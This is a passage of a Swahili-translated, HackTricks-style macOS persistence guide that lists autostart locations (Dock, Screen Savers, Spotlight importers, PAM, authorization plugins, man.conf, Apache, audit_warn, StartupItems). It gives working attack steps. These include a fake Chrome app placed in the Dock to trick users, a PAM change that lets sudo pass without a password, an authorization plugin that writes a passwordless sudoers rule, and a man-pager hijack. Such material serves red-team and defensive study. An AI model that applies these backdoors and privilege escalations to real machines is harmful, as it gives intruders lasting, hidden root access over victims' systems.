# Add /System/Applications/Books.app
defaults write com.apple.dock persistent-apps -array-add '<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/System/Applications/Books.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'

# Restart Dock
killall Dock

Kwa kutumia baadhi ya social engineering unaweza kujifanya kwa mfano Google Chrome ndani ya dock na kwa kweli kutekeleza script yako mwenyewe:

#!/bin/sh

# THIS REQUIRES GOOGLE CHROME TO BE INSTALLED (TO COPY THE ICON)

rm -rf /tmp/Google\ Chrome.app/ 2>/dev/null

# Create App structure
mkdir -p /tmp/Google\ Chrome.app/Contents/MacOS
mkdir -p /tmp/Google\ Chrome.app/Contents/Resources

# Payload to execute
echo '#!/bin/sh
open /Applications/Google\ Chrome.app/ &
touch /tmp/ImGoogleChrome' > /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome

chmod +x /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome

# Info.plist
cat << EOF > /tmp/Google\ Chrome.app/Contents/Info.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CFBundleExecutable</key>
<string>Google Chrome</string>
<key>CFBundleIdentifier</key>
<string>com.google.Chrome</string>
<key>CFBundleName</key>
<string>Google Chrome</string>
<key>CFBundleVersion</key>
<string>1.0</string>
<key>CFBundleShortVersionString</key>
<string>1.0</string>
<key>CFBundleInfoDictionaryVersion</key>
<string>6.0</string>
<key>CFBundlePackageType</key>
<string>APPL</string>
<key>CFBundleIconFile</key>
<string>app</string>
</dict>
</plist>
EOF

# Copy icon from Google Chrome
cp /Applications/Google\ Chrome.app/Contents/Resources/app.icns /tmp/Google\ Chrome.app/Contents/Resources/app.icns

# Add to Dock
defaults write com.apple.dock persistent-apps -array-add '<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/tmp/Google Chrome.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'
killall Dock

Color Pickers

Writeup: https://theevilbit.github.io/beyond/beyond_0017

• Inatumika kupita sandbox: 🟠

• Hatua maalum sana inahitaji kutokea

• Utamalizika katika sandbox nyingine

• TCC bypass: 🔴

Location

• /Library/ColorPickers

• Msingi unahitajika

• Trigger: Tumia mchoro wa rangi

• ~/Library/ColorPickers

• Trigger: Tumia mchoro wa rangi

Description & Exploit

Tengeneza bundle ya mchoro wa rangi na msimbo wako (unaweza kutumia hii kwa mfano) na ongeza muundaji (kama katika sehemu ya Screen Saver) na nakili bundle hiyo kwenye ~/Library/ColorPickers.

Kisha, wakati mchoro wa rangi unapoanzishwa, sauti yako inapaswa pia kuwa.

Kumbuka kwamba binary inayopakia maktaba yako ina sandbox yenye vizuizi vikali sana: /System/Library/Frameworks/AppKit.framework/Versions/C/XPCServices/LegacyExternalColorPickerService-x86_64.xpc/Contents/MacOS/LegacyExternalColorPickerService-x86_64

[Key] com.apple.security.temporary-exception.sbpl
[Value]
[Array]
[String] (deny file-write* (home-subpath "/Library/Colors"))
[String] (allow file-read* process-exec file-map-executable (home-subpath "/Library/ColorPickers"))
[String] (allow file-read* (extension "com.apple.app-sandbox.read"))

Finder Sync Plugins

Andiko: https://theevilbit.github.io/beyond/beyond_0026/ Andiko: https://objective-see.org/blog/blog_0x11.html

• Inatumika kupita sandbox: Hapana, kwa sababu unahitaji kutekeleza programu yako mwenyewe

• TCC bypass: ???

Mahali

• Programu maalum

Maelezo & Ulaghai

Mfano wa programu yenye Finder Sync Extension inaweza kupatikana hapa.

Programu zinaweza kuwa na Finder Sync Extensions. Kupanua hii kutakwenda ndani ya programu ambayo itatekelezwa. Zaidi ya hayo, ili kupanua iweze kutekeleza msimbo wake lazima isainiwe na cheti halali cha mende wa Apple, lazima iwe sandboxed (ingawa visamehe vya kulegeza vinaweza kuongezwa) na lazima iandikishwe na kitu kama:

pluginkit -a /Applications/FindIt.app/Contents/PlugIns/FindItSync.appex
pluginkit -e use -i com.example.InSync.InSync

Screen Saver

Writeup: https://theevilbit.github.io/beyond/beyond_0016/ Writeup: https://posts.specterops.io/saving-your-access-d562bf5bf90b

• Inatumika kupita sandbox: 🟠

• Lakini utaishia kwenye sandbox ya programu ya kawaida

• TCC bypass: 🔴

Location

• /System/Library/Screen Savers

• Root required

• Trigger: Chagua screen saver

• /Library/Screen Savers

• Root required

• Trigger: Chagua screen saver

• ~/Library/Screen Savers

• Trigger: Chagua screen saver

Description & Exploit

Unda mradi mpya katika Xcode na uchague kiolezo ili kuunda Screen Saver mpya. Kisha, ongeza msimbo wako kwake, kwa mfano msimbo ufuatao ili kuunda logs.

Build hiyo, na nakili bundle ya .saver kwenye ~/Library/Screen Savers. Kisha, fungua GUI ya Screen Saver na ukibonyeza tu, inapaswa kuunda logs nyingi:

sudo log stream --style syslog --predicate 'eventMessage CONTAINS[c] "hello_screensaver"'

Timestamp                       (process)[PID]
2023-09-27 22:55:39.622369+0200  localhost legacyScreenSaver[41737]: (ScreenSaverExample) hello_screensaver void custom(int, const char **)
2023-09-27 22:55:39.622623+0200  localhost legacyScreenSaver[41737]: (ScreenSaverExample) hello_screensaver -[ScreenSaverExampleView initWithFrame:isPreview:]
2023-09-27 22:55:39.622704+0200  localhost legacyScreenSaver[41737]: (ScreenSaverExample) hello_screensaver -[ScreenSaverExampleView hasConfigureSheet]

Saver code:

//
//  ScreenSaverExampleView.m
//  ScreenSaverExample
//
//  Created by Carlos Polop on 27/9/23.
//

#import "ScreenSaverExampleView.h"

@implementation ScreenSaverExampleView

- (instancetype)initWithFrame:(NSRect)frame isPreview:(BOOL)isPreview
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
self = [super initWithFrame:frame isPreview:isPreview];
if (self) {
[self setAnimationTimeInterval:1/30.0];
}
return self;
}

- (void)startAnimation
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
[super startAnimation];
}

- (void)stopAnimation
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
[super stopAnimation];
}

- (void)drawRect:(NSRect)rect
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
[super drawRect:rect];
}

- (void)animateOneFrame
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
return;
}

- (BOOL)hasConfigureSheet
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
return NO;
}

- (NSWindow*)configureSheet
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
return nil;
}

__attribute__((constructor))
void custom(int argc, const char **argv) {
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
}

@end

Spotlight Plugins

writeup: https://theevilbit.github.io/beyond/beyond_0011/

• Inatumika kupita sandbox: 🟠

• Lakini utaishia kwenye sandbox ya programu

• TCC bypass: 🔴

• Sandbox inaonekana kuwa na mipaka sana

Location

• ~/Library/Spotlight/

• Trigger: Faili mpya yenye kiambatisho kinachosimamiwa na plugin ya spotlight inaundwa.

• /Library/Spotlight/

• Trigger: Faili mpya yenye kiambatisho kinachosimamiwa na plugin ya spotlight inaundwa.

• Inahitaji root

• /System/Library/Spotlight/

• Trigger: Faili mpya yenye kiambatisho kinachosimamiwa na plugin ya spotlight inaundwa.

• Inahitaji root

• Some.app/Contents/Library/Spotlight/

• Trigger: Faili mpya yenye kiambatisho kinachosimamiwa na plugin ya spotlight inaundwa.

• Inahitaji programu mpya

Description & Exploitation

Spotlight ni kipengele cha utafutaji kilichojengwa ndani ya macOS, kilichoundwa kutoa watumiaji ufikiaji wa haraka na wa kina kwa data kwenye kompyuta zao. Ili kuwezesha uwezo huu wa utafutaji wa haraka, Spotlight inashikilia hifadhidata ya miliki na kuunda orodha kwa kuchambua faili nyingi, ikiruhusu utafutaji wa haraka kupitia majina ya faili na maudhui yao.

Mekaniki ya msingi ya Spotlight inahusisha mchakato wa kati unaoitwa 'mds', ambayo inasimama kwa 'metadata server'. Mchakato huu unaratibu huduma nzima ya Spotlight. Kuongeza hii, kuna daemon nyingi za 'mdworker' zinazofanya kazi mbalimbali za matengenezo, kama vile kuorodhesha aina tofauti za faili (ps -ef | grep mdworker). Kazi hizi zinawezekana kupitia plugins za kuagiza Spotlight, au ".mdimporter bundles", ambazo zinamwezesha Spotlight kuelewa na kuorodhesha maudhui katika aina mbalimbali za muundo wa faili.

Plugins au .mdimporter bundles ziko katika maeneo yaliyotajwa hapo awali na ikiwa bundle mpya itaonekana inachukuliwa ndani ya dakika (hakuna haja ya kuanzisha huduma yoyote upya). Bundles hizi zinahitaji kuonyesha ni aina gani ya faili na viambatisho vinaweza kusimamiwa, kwa njia hii, Spotlight itazitumia wakati faili mpya yenye kiambatisho kilichotajwa inaundwa.

Inawezekana kupata mdimporters zote zilizopakiwa zinazoendesha:

mdimport -L
Paths: id(501) (
"/System/Library/Spotlight/iWork.mdimporter",
"/System/Library/Spotlight/iPhoto.mdimporter",
"/System/Library/Spotlight/PDF.mdimporter",
[...]

Na kwa mfano /Library/Spotlight/iBooksAuthor.mdimporter inatumika kuchambua aina hizi za faili (nyongeza .iba na .book miongoni mwa zingine):

plutil -p /Library/Spotlight/iBooksAuthor.mdimporter/Contents/Info.plist

[...]
"CFBundleDocumentTypes" => [
0 => {
"CFBundleTypeName" => "iBooks Author Book"
"CFBundleTypeRole" => "MDImporter"
"LSItemContentTypes" => [
0 => "com.apple.ibooksauthor.book"
1 => "com.apple.ibooksauthor.pkgbook"
2 => "com.apple.ibooksauthor.template"
3 => "com.apple.ibooksauthor.pkgtemplate"
]
"LSTypeIsPackage" => 0
}
]
[...]
=> {
"UTTypeConformsTo" => [
0 => "public.data"
1 => "public.composite-content"
]
"UTTypeDescription" => "iBooks Author Book"
"UTTypeIdentifier" => "com.apple.ibooksauthor.book"
"UTTypeReferenceURL" => "http://www.apple.com/ibooksauthor"
"UTTypeTagSpecification" => {
"public.filename-extension" => [
0 => "iba"
1 => "book"
]
}
}
[...]

Ili kuunda importer yako mwenyewe unaweza kuanzia na mradi huu: https://github.com/megrimm/pd-spotlight-importer kisha badilisha jina, CFBundleDocumentTypes na ongeza UTImportedTypeDeclarations ili iweze kusaidia nyongeza unayotaka kusaidia na kuakisi hizo katika schema.xml. Kisha badilisha msimbo wa kazi GetMetadataForFile ili kutekeleza payload yako wakati faili yenye nyongeza iliyoshughulikiwa inaundwa.

Hatimaye jenga na nakili .mdimporter yako mpya kwenye moja ya maeneo yaliyotajwa hapo awali na unaweza kuangalia ikiwa imepakuliwa ukifuatilia kumbukumbu au kuangalia mdimport -L.

Pane ya Mipangilio

Andiko: https://theevilbit.github.io/beyond/beyond_0009/

• Inafaida kupita sandbox: 🟠

• Inahitaji hatua maalum ya mtumiaji

• Kupita TCC: 🔴

Mahali

• /System/Library/PreferencePanes

• /Library/PreferencePanes

• ~/Library/PreferencePanes

Maelezo

Haionekani kama hii inafanya kazi tena.

Kupita Sandbox ya Root

Kila Wakati

Andiko: https://theevilbit.github.io/beyond/beyond_0019/

• Inafaida kupita sandbox: 🟠

• Lakini unahitaji kuwa root

• Kupita TCC: 🔴

Mahali

• /etc/periodic/daily, /etc/periodic/weekly, /etc/periodic/monthly, /usr/local/etc/periodic

• Inahitaji Root

• Kichocheo: Wakati wa wakati

• /etc/daily.local, /etc/weekly.local au /etc/monthly.local

• Inahitaji Root

• Kichocheo: Wakati wa wakati

Maelezo & Ukatili

Mifumo ya kila wakati (/etc/periodic) inatekelezwa kwa sababu ya daemons za uzinduzi zilizowekwa katika /System/Library/LaunchDaemons/com.apple.periodic*. Kumbuka kwamba scripts zilizohifadhiwa katika /etc/periodic/ zina tekelezwa kama mmiliki wa faili, hivyo hii haitafanya kazi kwa ajili ya kupanda kwa haki.

# Launch daemons that will execute the periodic scripts
ls -l /System/Library/LaunchDaemons/com.apple.periodic*
-rw-r--r--  1 root  wheel  887 May 13 00:29 /System/Library/LaunchDaemons/com.apple.periodic-daily.plist
-rw-r--r--  1 root  wheel  895 May 13 00:29 /System/Library/LaunchDaemons/com.apple.periodic-monthly.plist
-rw-r--r--  1 root  wheel  891 May 13 00:29 /System/Library/LaunchDaemons/com.apple.periodic-weekly.plist

# The scripts located in their locations
ls -lR /etc/periodic
total 0
drwxr-xr-x  11 root  wheel  352 May 13 00:29 daily
drwxr-xr-x   5 root  wheel  160 May 13 00:29 monthly
drwxr-xr-x   3 root  wheel   96 May 13 00:29 weekly

/etc/periodic/daily:
total 72
-rwxr-xr-x  1 root  wheel  1642 May 13 00:29 110.clean-tmps
-rwxr-xr-x  1 root  wheel   695 May 13 00:29 130.clean-msgs
[...]

/etc/periodic/monthly:
total 24
-rwxr-xr-x  1 root  wheel   888 May 13 00:29 199.rotate-fax
-rwxr-xr-x  1 root  wheel  1010 May 13 00:29 200.accounting
-rwxr-xr-x  1 root  wheel   606 May 13 00:29 999.local

/etc/periodic/weekly:
total 8
-rwxr-xr-x  1 root  wheel  620 May 13 00:29 999.local

Kuna skripti nyingine za kipindi ambazo zitatekelezwa zinazoonyeshwa katika /etc/defaults/periodic.conf:

grep "Local scripts" /etc/defaults/periodic.conf
daily_local="/etc/daily.local"				# Local scripts
weekly_local="/etc/weekly.local"			# Local scripts
monthly_local="/etc/monthly.local"			# Local scripts

Ikiwa utaweza kuandika yoyote ya faili /etc/daily.local, /etc/weekly.local au /etc/monthly.local itatekelezwa mapema au baadaye.

PAM

Writeup: Linux Hacktricks PAM Writeup: https://theevilbit.github.io/beyond/beyond_0005/

• Inasaidia kupita sandbox: 🟠

• Lakini unahitaji kuwa root

• TCC bypass: 🔴

Mahali

• Root daima inahitajika

Maelezo & Utekelezaji

Kama PAM inazingatia zaidi kuendelea na malware kuliko utekelezaji rahisi ndani ya macOS, blogu hii haitatoa maelezo ya kina, soma writeups ili kuelewa mbinu hii vizuri zaidi.

Angalia moduli za PAM kwa:

ls -l /etc/pam.d

Tekniki ya kudumu/kuinua mamlaka inayotumia PAM ni rahisi kama kubadilisha moduli /etc/pam.d/sudo kwa kuongeza mstari huu mwanzoni:

auth       sufficient     pam_permit.so

Hivyo itakuwa inafanana na kitu kama hiki:

# sudo: auth account password session
auth       sufficient     pam_permit.so
auth       include        sudo_local
auth       sufficient     pam_smartcard.so
auth       required       pam_opendirectory.so
account    required       pam_permit.so
password   required       pam_deny.so
session    required       pam_permit.so

Na kwa hivyo, jaribio lolote la kutumia sudo litafanya kazi.

Mfano mwingine mzuri ni su, ambapo unaweza kuona kwamba pia inawezekana kutoa vigezo kwa moduli za PAM (na unaweza pia kuweka backdoor kwenye faili hii):

cat /etc/pam.d/su
# su: auth account session
auth       sufficient     pam_rootok.so
auth       required       pam_opendirectory.so
account    required       pam_group.so no_warn group=admin,wheel ruser root_only fail_safe
account    required       pam_opendirectory.so no_check_shell
password   required       pam_opendirectory.so
session    required       pam_launchd.so

Authorization Plugins

Writeup: https://theevilbit.github.io/beyond/beyond_0028/ Writeup: https://posts.specterops.io/persistent-credential-theft-with-authorization-plugins-d17b34719d65

• Inatumika kupita sandbox: 🟠

• Lakini unahitaji kuwa root na kufanya mipangilio ya ziada

• TCC bypass: ???

Location

• /Library/Security/SecurityAgentPlugins/

• Root inahitajika

• Pia inahitajika kuunda hifadhidata ya idhini ili kutumia plugin

Description & Exploitation

Unaweza kuunda plugin ya idhini ambayo itatekelezwa wakati mtumiaji anapoingia ili kudumisha kudumu. Kwa maelezo zaidi kuhusu jinsi ya kuunda moja ya hizi plugins angalia maandiko ya awali (na kuwa makini, moja iliyoandikwa vibaya inaweza kukufunga na utahitaji kusafisha mac yako kutoka kwa hali ya urejelezi).

// Compile the code and create a real bundle
// gcc -bundle -framework Foundation main.m -o CustomAuth
// mkdir -p CustomAuth.bundle/Contents/MacOS
// mv CustomAuth CustomAuth.bundle/Contents/MacOS/

#import <Foundation/Foundation.h>

__attribute__((constructor)) static void run()
{
NSLog(@"%@", @"[+] Custom Authorization Plugin was loaded");
system("echo \"%staff ALL=(ALL) NOPASSWD:ALL\" >> /etc/sudoers");
}

Hamisha kifurushi kwenye eneo litakalopakiwa:

cp -r CustomAuth.bundle /Library/Security/SecurityAgentPlugins/

Hatimaye ongeza kanuni ya kupakia Plugin hii:

cat > /tmp/rule.plist <<EOF
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>class</key>
<string>evaluate-mechanisms</string>
<key>mechanisms</key>
<array>
<string>CustomAuth:login,privileged</string>
</array>
</dict>
</plist>
EOF

security authorizationdb write com.asdf.asdf < /tmp/rule.plist

The evaluate-mechanisms itasema kwa mfumo waidhinishaji kwamba itahitaji kuita mekanizma ya nje kwa ajili ya idhini. Zaidi ya hayo, privileged itafanya itekelezwe na root.

Ianzishe kwa:

security authorize com.asdf.asdf

Na kisha kikundi cha wafanyakazi kinapaswa kuwa na sudo ufikiaji (soma /etc/sudoers ili kuthibitisha).

Man.conf

Writeup: https://theevilbit.github.io/beyond/beyond_0030/

• Inasaidia kupita sandbox: 🟠

• Lakini unahitaji kuwa root na mtumiaji lazima atumie man

• TCC bypass: 🔴

Mahali

• /private/etc/man.conf

• Root inahitajika

• /private/etc/man.conf: Wakati wowote man inapotumika

Maelezo & Ulaghai

Faili ya config /private/etc/man.conf inaonyesha binary/script ya kutumia wakati wa kufungua faili za hati za man. Hivyo, njia ya executable inaweza kubadilishwa ili kila wakati mtumiaji anapotumia man kusoma hati, backdoor inatekelezwa.

Kwa mfano weka katika /private/etc/man.conf:

MANPAGER /tmp/view

Na kisha unda /tmp/view kama:

#!/bin/zsh

touch /tmp/manconf

/usr/bin/less -s

Apache2

Writeup: https://theevilbit.github.io/beyond/beyond_0023/

• Inatumika kupita sandbox: 🟠

• Lakini unahitaji kuwa root na apache inahitaji kuwa inafanya kazi

• TCC bypass: 🔴

• Httpd haina entitlements

Location

• /etc/apache2/httpd.conf

• Root inahitajika

• Trigger: Wakati Apache2 inaanza

Description & Exploit

Unaweza kuashiria katika /etc/apache2/httpd.conf ili kupakia moduli kwa kuongeza mstari kama:

LoadModule my_custom_module /Users/Shared/example.dylib "My Signature Authority"

Kwa njia hii, moduli zako zilizokusanywa zitawekwa na Apache. Jambo pekee ni kwamba unahitaji kuisaini na cheti halali cha Apple, au unahitaji kuongeza cheti kipya kinachotambulika katika mfumo na kuiandika kwa kutumia hicho.

Kisha, ikiwa inahitajika, kuhakikisha kwamba seva itaanza unaweza kutekeleza:

sudo launchctl load -w /System/Library/LaunchDaemons/org.apache.httpd.plist

Mfano wa msimbo kwa ajili ya Dylb:

#include <stdio.h>
#include <syslog.h>

__attribute__((constructor))
static void myconstructor(int argc, const char **argv)
{
printf("[+] dylib constructor called from %s\n", argv[0]);
syslog(LOG_ERR, "[+] dylib constructor called from %s\n", argv[0]);
}

BSM audit framework

Writeup: https://theevilbit.github.io/beyond/beyond_0031/

• Inatumika kupita sandbox: 🟠

• Lakini unahitaji kuwa root, auditd iwe inafanya kazi na kusababisha onyo

• TCC bypass: 🔴

Location

• /etc/security/audit_warn

• Root inahitajika

• Trigger: Wakati auditd inagundua onyo

Description & Exploit

Wakati wowote auditd inagundua onyo, script /etc/security/audit_warn inatekelezwa. Hivyo unaweza kuongeza payload yako juu yake.

echo "touch /tmp/auditd_warn" >> /etc/security/audit_warn

You could force a warning with sudo audit -n.

Startup Items

The StartupItem is a directory that should be positioned within either /Library/StartupItems/ or /System/Library/StartupItems/. Once this directory is established, it must encompass two specific files:

1. An rc script: A shell script executed at startup.

2. A plist file, specifically named StartupParameters.plist, which contains various configuration settings.

Ensure that both the rc script and the StartupParameters.plist file are correctly placed inside the StartupItem directory for the startup process to recognize and utilize them.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Description</key>
<string>This is a description of this service</string>
<key>OrderPreference</key>
<string>None</string> <!--Other req services to execute before this -->
<key>Provides</key>
<array>
<string>superservicename</string> <!--Name of the services provided by this file -->
</array>
</dict>
</plist>

#!/bin/sh
. /etc/rc.common

StartService(){
touch /tmp/superservicestarted
}

StopService(){
rm /tmp/superservicestarted
}

RestartService(){
echo "Restarting"
}

RunService "$1"

emond

Andiko: https://theevilbit.github.io/beyond/beyond_0023/

Iliyoanzishwa na Apple, emond ni mekanizma ya kurekodi ambayo inaonekana kuwa haijakamilika au labda imeachwa, lakini bado inapatikana. Ingawa si ya manufaa sana kwa msimamizi wa Mac, huduma hii isiyo na umaarufu inaweza kutumika kama njia ya kudumu kwa wahalifu wa mtandao, ambayo huenda ikakosa kuonekana na wasimamizi wengi wa macOS.

Kwa wale wanaojua kuhusu uwepo wake, kubaini matumizi yoyote mabaya ya emond ni rahisi. LaunchDaemon ya mfumo kwa huduma hii inatafuta scripts za kutekeleza katika saraka moja. Ili kuchunguza hili, amri ifuatayo inaweza kutumika:

ls -l /private/var/db/emondClients

XQuartz

Writeup: https://theevilbit.github.io/beyond/beyond_0018/

Location

• /opt/X11/etc/X11/xinit/privileged_startx.d

• Inahitajika root

• Trigger: Pamoja na XQuartz

Description & Exploit

XQuartz haitumiki tena katika macOS, hivyo ikiwa unataka maelezo zaidi angalia andiko.

kext

Location

Ili kufunga KEXT kama kipengele cha kuanzisha, inahitaji kufungwa katika moja ya maeneo yafuatayo:

• /System/Library/Extensions

• Faili za KEXT zilizojengwa ndani ya mfumo wa uendeshaji wa OS X.

• /Library/Extensions

• Faili za KEXT zilizofungwa na programu za upande wa tatu

Unaweza kuorodhesha faili za kext zilizopakiwa kwa sasa kwa:

kextstat #List loaded kext
kextload /path/to/kext.kext #Load a new one based on path
kextload -b com.apple.driver.ExampleBundle #Load a new one based on path
kextunload /path/to/kext.kext
kextunload -b com.apple.driver.ExampleBundle

Kwa maelezo zaidi kuhusu nyongeza za kernel angalia sehemu hii.

amstoold

Andiko: https://theevilbit.github.io/beyond/beyond_0029/

Mahali

• /usr/local/bin/amstoold

• Inahitajika Root

Maelezo & Ukatili

Kwa wazi plist kutoka /System/Library/LaunchAgents/com.apple.amstoold.plist ilikuwa ikitumia hii binary wakati ikifichua huduma ya XPC... jambo ni kwamba binary hiyo haikuexist, hivyo unaweza kuweka kitu hapo na wakati huduma ya XPC itakapoitwa binary yako itaitwa.

Siwezi tena kuipata hii katika macOS yangu.

xsanctl

Andiko: https://theevilbit.github.io/beyond/beyond_0015/

Mahali

• /Library/Preferences/Xsan/.xsanrc

• Inahitajika Root

• Kichocheo: Wakati huduma inapoendeshwa (nadra)

Maelezo & ukatili

Kwa wazi si kawaida sana kuendesha skripti hii na sikuweza hata kuipata katika macOS yangu, hivyo ikiwa unataka maelezo zaidi angalia andiko.

/etc/rc.common

Pia inawezekana kuweka hapa amri ambazo zitatekelezwa wakati wa kuanzisha. Mfano wa skripti ya kawaida ya rc.common:

#
# Common setup for startup scripts.
#
# Copyright 1998-2002 Apple Computer, Inc.
#

######################
# Configure the shell #
######################

#
# Be strict
#
#set -e
set -u

#
# Set command search path
#
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/libexec:/System/Library/CoreServices; export PATH

#
# Set the terminal mode
#
#if [ -x /usr/bin/tset ] && [ -f /usr/share/misc/termcap ]; then
#    TERM=$(tset - -Q); export TERM
#fi

###################
# Useful functions #
###################

#
# Determine if the network is up by looking for any non-loopback
# internet network interfaces.
#
CheckForNetwork()
{
local test

if [ -z "${NETWORKUP:=}" ]; then
test=$(ifconfig -a inet 2>/dev/null | sed -n -e '/127.0.0.1/d' -e '/0.0.0.0/d' -e '/inet/p' | wc -l)
if [ "${test}" -gt 0 ]; then
NETWORKUP="-YES-"
else
NETWORKUP="-NO-"
fi
fi
}

alias ConsoleMessage=echo

#
# Process management
#
GetPID ()
{
local program="$1"
local pidfile="${PIDFILE:=/var/run/${program}.pid}"
local     pid=""

if [ -f "${pidfile}" ]; then
pid=$(head -1 "${pidfile}")
if ! kill -0 "${pid}" 2> /dev/null; then
echo "Bad pid file $pidfile; deleting."
pid=""
rm -f "${pidfile}"
fi
fi

if [ -n "${pid}" ]; then
echo "${pid}"
return 0
else
return 1
fi
}

#
# Generic action handler
#
RunService ()
{
case $1 in
start  ) StartService   ;;
stop   ) StopService    ;;
restart) RestartService ;;
*      ) echo "$0: unknown argument: $1";;
esac
}

Mbinu na zana za kudumu

• https://github.com/cedowens/Persistent-Swift

• https://github.com/D00MFist/PersistentJXA